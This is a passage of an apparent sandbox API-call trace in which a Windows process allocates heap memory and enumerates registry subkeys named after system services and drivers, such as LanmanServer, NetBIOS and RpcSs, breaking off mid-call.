[0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5257e8 [0085.600] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x16, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ipnat.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.600] lstrlenW (lpString="ipnat.sys") returned 9 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5257c8 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5257a8 [0085.600] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x17, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="KeyIso", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.600] lstrlenW (lpString="KeyIso") returned 6 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f18 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525788 [0085.600] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x18, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LanmanServer", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.600] lstrlenW (lpString="LanmanServer") returned 12 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523ff0 [0085.600] GetProcessHeap () returned 0x510000 [0085.600] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525768 [0085.600] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x19, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LanmanWorkstation", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.601] lstrlenW (lpString="LanmanWorkstation") returned 17 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x526270 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525748 [0085.601] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="LmHosts", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.601] lstrlenW (lpString="LmHosts") returned 7 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525f30 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525728 [0085.601] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Messenger", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.601] lstrlenW (lpString="Messenger") returned 9 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525708 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5256e8 [0085.601] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPSDrv", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.601] lstrlenW (lpString="MPSDrv") returned 6 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f48 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5256c8 [0085.601] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPSSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.601] lstrlenW (lpString="MPSSvc") returned 6 [0085.601] GetProcessHeap () returned 0x510000 [0085.601] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f60 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5256a8 [0085.602] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.602] lstrlenW (lpString="mrxsmb") returned 6 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f78 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525688 [0085.602] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb10", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.602] lstrlenW (lpString="mrxsmb10") returned 8 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525668 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525648 [0085.602] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x20, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="mrxsmb20", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.602] lstrlenW (lpString="mrxsmb20") returned 8 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525628 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525608 [0085.602] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x21, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NativeWifiP", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.602] lstrlenW (lpString="NativeWifiP") returned 11 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x5255e8 [0085.602] GetProcessHeap () returned 0x510000 [0085.602] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5255c8 [0085.602] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x22, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NDIS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.602] lstrlenW (lpString="NDIS") returned 4 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525f90 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5255a8 [0085.603] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x23, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NDIS Wrapper", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.603] lstrlenW (lpString="NDIS Wrapper") returned 12 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523fc8 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525588 [0085.603] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x24, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ndiscap", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.603] lstrlenW (lpString="ndiscap") returned 7 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525fa8 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525568 [0085.603] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x25, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Ndisuio", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.603] lstrlenW (lpString="Ndisuio") returned 7 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525fc0 [0085.603] GetProcessHeap () returned 0x510000 [0085.603] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525548 [0085.603] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x26, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBIOS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.604] lstrlenW (lpString="NetBIOS") returned 7 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525fd8 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525528 [0085.604] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x27, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBIOSGroup", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.604] lstrlenW (lpString="NetBIOSGroup") returned 12 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523fa0 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525508 [0085.604] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x28, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetBT", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.604] lstrlenW (lpString="NetBT") returned 5 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x525ff0 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5254e8 [0085.604] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x29, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetDDEGroup", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.604] lstrlenW (lpString="NetDDEGroup") returned 11 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x5254c8 [0085.604] GetProcessHeap () returned 0x510000 [0085.604] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5254a8 [0085.605] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netlogon", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.605] lstrlenW (lpString="Netlogon") returned 8 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525488 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525468 [0085.605] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetMan", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.605] lstrlenW (lpString="NetMan") returned 6 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x526008 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525448 [0085.605] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="netprofm", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.605] lstrlenW (lpString="netprofm") returned 8 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x525428 [0085.605] GetProcessHeap () returned 0x510000 [0085.605] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525408 [0085.605] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.605] lstrlenW (lpString="Network") returned 7 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526020 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253e8 [0085.606] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NetworkProvider", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.606] lstrlenW (lpString="NetworkProvider") returned 15 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x20) returned 0x524018 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526548 [0085.606] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NlaSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.606] lstrlenW (lpString="NlaSvc") returned 6 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x526038 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526568 [0085.606] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x30, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Nsi", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.606] lstrlenW (lpString="Nsi") returned 3 [0085.606] GetProcessHeap () returned 0x510000 [0085.606] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x525258 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526588 [0085.607] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x31, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="nsiproxy.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.607] lstrlenW (lpString="nsiproxy.sys") returned 12 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x524040 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265a8 [0085.607] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x32, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NTDS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.607] lstrlenW (lpString="NTDS") returned 4 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x526050 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265c8 [0085.607] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x33, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PCI Configuration", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.607] lstrlenW (lpString="PCI Configuration") returned 17 [0085.607] GetProcessHeap () returned 0x510000 [0085.607] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x5262a0 [0085.607] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265e8 [0085.608] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x34, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PlugPlay", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.608] lstrlenW (lpString="PlugPlay") returned 8 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x526608 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526628 [0085.608] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x35, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP Filter", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.608] lstrlenW (lpString="PNP Filter") returned 10 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x526648 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526668 [0085.608] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x36, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP_TDI", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.608] lstrlenW (lpString="PNP_TDI") returned 7 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526068 [0085.608] GetProcessHeap () returned 0x510000 [0085.608] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526688 [0085.608] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x37, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PolicyAgent", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.609] lstrlenW (lpString="PolicyAgent") returned 11 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x5266a8 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5266c8 [0085.609] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x38, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Power", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.609] lstrlenW (lpString="Power") returned 5 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x526080 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5266e8 [0085.609] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x39, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Primary disk", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.609] lstrlenW (lpString="Primary disk") returned 12 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x524068 [0085.609] GetProcessHeap () returned 0x510000 [0085.609] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526708 [0085.609] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ProfSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.610] lstrlenW (lpString="ProfSvc") returned 7 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526098 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526728 [0085.610] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdbss", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.610] lstrlenW (lpString="rdbss") returned 5 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x5260b0 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526748 [0085.610] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdpencdd.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.610] lstrlenW (lpString="rdpencdd.sys") returned 12 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x524090 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526768 [0085.610] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdsessmgr", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.610] lstrlenW (lpString="rdsessmgr") returned 9 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526788 [0085.610] GetProcessHeap () returned 0x510000 [0085.610] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5267a8 [0085.611] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcEptMapper", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.611] lstrlenW (lpString="RpcEptMapper") returned 12 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x5240b8 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5267c8 [0085.611] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcSs", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.611] lstrlenW (lpString="RpcSs") returned 5 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, 